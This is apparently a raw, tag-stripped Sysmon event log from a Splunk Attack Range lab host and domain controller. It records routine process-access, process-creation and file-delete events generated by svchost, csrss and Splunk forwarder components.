10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0EF5-6216-0E04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.318{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EF5-6216-0E04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:49.319{4F8D34B0-0EF5-6216-0E04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:50.841{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AAA6DA04A15B7F673FD11E067D63276,SHA256=CE9780784BC83B63C51167918704C7F541E7CAA83B67414DA484AF22DC448769,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:50.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=453D3B028A33D2F1EC35A347BB4A8519,SHA256=F18FA3382CA4CB83D0FBC20D85B845F7EFCBEC29D1513F2915E574B2EC14145C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:50.225{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE5164B1DCA74AFE2DA94ACA98FF2B9A,SHA256=5FC6EE2F96666986A7C6C08CDAA96F8BAB335E1857E760B99B996E96023802C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:50.053{4F8D34B0-0EF5-6216-0F04-000000003902}3652644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:51.856{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880E4736A8C01371319813A18C85467A,SHA256=EC0271ABDE2592AF9B8AA0E8E883A6738C880D7955F7E7BCD70C273CECCA2248,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EF7-6216-1004-000000003902}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0EF7-6216-1004-000000003902}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:51.490{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EF7-6216-1004-000000003902}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 